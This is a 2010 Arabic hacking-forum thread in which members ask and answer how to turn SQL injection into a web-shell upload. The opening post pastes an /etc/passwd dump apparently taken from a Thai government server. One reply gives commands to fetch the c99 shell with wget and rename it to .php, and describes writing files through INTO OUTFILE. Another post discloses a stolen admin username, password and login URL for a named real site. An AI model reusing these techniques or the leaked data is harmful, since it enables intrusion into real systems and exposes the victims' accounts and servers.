التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-06-2010, 05:07 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية TheGame
 

 

 
إحصائية العضو







TheGame غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
TheGame is on a distinguished road

...... غير مجاب: كيف الاستفادة من امر LOAD_FILE('\')


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

كيفكم شباب ان شاء الله بخير


ندخل في الموضوع اعتقد الموضوع واضح


كيف استفيد من الامر load_file('\')

مثلا عند اخراج مثل هذه المعلومات بالامر

/etc/password

root:x:0:0:root:/root:/bin/bash daemon:x1:daemon:/usr/sbin:/bin/sh bin:x2:bin:/bin:/bin/sh sys:x3:sys:/dev:/bin/sh sync:x65534:sync:/bin:/bin/sync games:x60:games:/usr/games:/bin/sh man:x12:man:/var/cache/man:/bin/sh lp:x7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh



وفي امر ثاني مجنني كلما اخترق موقع بثغرة SQL مااستفيد منه اي شي لان لا استطيع رفع الشل

وفي موضوع يقول لفولوكانو الى يضع مكان للابلود في الصفحة مافهمت منه اي شي واطبق مع لاكن بدون

فائدة وفي طريقة ثانية ايضا الي يقول into_file هيك شي لاكن المشكلة يقول لازم الماجك كوتس اوف

بس اليمحيرني الماجك كوتس يتخطى بالتشفير لاكن لماذا هذا لايتخطى انا قصدي موضوع حسين اكس

وارجو ان القا الاجابات المفرحة باذن الله وشكرا




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC ;dt hghsjth]m lk hlv LOAD_FILE('\')

التوقيع

[motr]
||||||||||||||||||||||||||||
|||||||||| الله اكبر |||||||||||||
||||||||||||||||||||||||||||
[/motr]



[motr]TheGame[/motr]

 


التعديل الأخير تم بواسطة TheGame ; 07-06-2010 الساعة 05:09 AM. سبب آخر: خطأ مطبعي حزين جدااااااا

   

رد مع اقتباس
قديم 07-06-2010, 08:34 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mobdeen
 

 

 
إحصائية العضو







mobdeen غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mobdeen is on a distinguished road

افتراضي


وعليكم السلام ورحمة الله وبركاته

السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن
وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include
وبهذه تستطيع ايضا ان ترفع شل بالامر
wget www.xxxx.com/c99.txt
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php
وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش
(اذهب الى الدرس 8 في دورة استغلال الثغرات)

السؤال الثاني
انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا
واما عن into_file فهو تكملة للامر
load_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك
واتمنى اني افدتك

التوقيع

احبكم كلكم
smilies15smilies15smilies15

 

   

رد مع اقتباس
قديم 07-06-2010, 12:11 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية TheGame
 

 

 
إحصائية العضو







TheGame غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
TheGame is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة mobdeen
وعليكم السلام ورحمة الله وبركاته

السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن
وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include
وبهذه تستطيع ايضا ان ترفع شل بالامر
wget www.xxxx.com/c99.txt
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php
وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش
(اذهب الى الدرس 8 في دورة استغلال الثغرات)

السؤال الثاني
انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا
واما عن into_file فهو تكملة للامرload_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك
واتمنى اني افدتك


اخي العزيز هل قصدك وضع
wget www.xxxx.com/c99.txt في load_file('\')

يعني load_file('\
wget www.xxxx.com/c99.txt)


وماجاوبتني على اليوزرات ماذا استفاد منها




smilies5
التوقيع

[motr]
||||||||||||||||||||||||||||
|||||||||| الله اكبر |||||||||||||
||||||||||||||||||||||||||||
[/motr]



[motr]TheGame[/motr]

 

   

رد مع اقتباس
قديم 11-06-2010, 03:41 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية dr_hacker_0
 

 

 
إحصائية العضو






dr_hacker_0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dr_hacker_0 is on a distinguished road

افتراضي


l
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php

حياك الله اخي انا عندي نفس المشكلة وعندي سؤال اخي الفاضل

او نوعا ما اريد منك شرح سريعا لو كان امكن


هل نضع داك الامر ورابط الشل في العومد المصاب متلا اخي

انا عندي موقع مصاب نعتبر

www.yyy.com=1,2,3,4,5,6-

العمود الرابع هو المصاب هل نضع الامر الدي كتبت مع رابط الشل في العمود المصاب ؟

   

رد مع اقتباس
قديم 07-06-2010, 03:42 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية mobdeen
 

 

 
إحصائية العضو







mobdeen غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mobdeen is on a distinguished road

افتراضي


اذا تريد ضغ رابط الموقع المصاب
مع الاستغلاللحتى نكمل لك
لانك شوية مش فاهم القصة

التوقيع

احبكم كلكم
smilies15smilies15smilies15

 

   

رد مع اقتباس
قديم 07-06-2010, 06:52 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية TheGame
 

 

 
إحصائية العضو







TheGame غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
TheGame is on a distinguished road

افتراضي


اخي خذ هذا المثل تم استخراج اليوزر والباس لاكن مااستفدت اي شي منه


اليوزر: delider
الباسوورد: stormfury
وهذا لوحة التحكم

http://www.amaigabeko.com/admin/login.php

يعني معقولة كلما اخترق موقع بالـSQL مااقدر ارفع عليه شل

التوقيع

[motr]
||||||||||||||||||||||||||||
|||||||||| الله اكبر |||||||||||||
||||||||||||||||||||||||||||
[/motr]



[motr]TheGame[/motr]

 

   

رد مع اقتباس
قديم 07-15-2010, 01:05 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


في شرح بقسم sql

كيف ترفع شل من هاي النقطه

(راجع المواضيع المثبته بقسم sql )

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
سؤال من مبتدء للخبراء حول امر load_file واهميته KaLa$nikoV جـــ'ابات العناكــ'ب 9 05-04-2014 07:09 PM
بمناسبة امر load_file('/') .~Amer.?AlnJ0M~.! جـــ'ابات العناكــ'ب 6 11-20-2009 04:03 PM


الساعة الآن 03:37 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0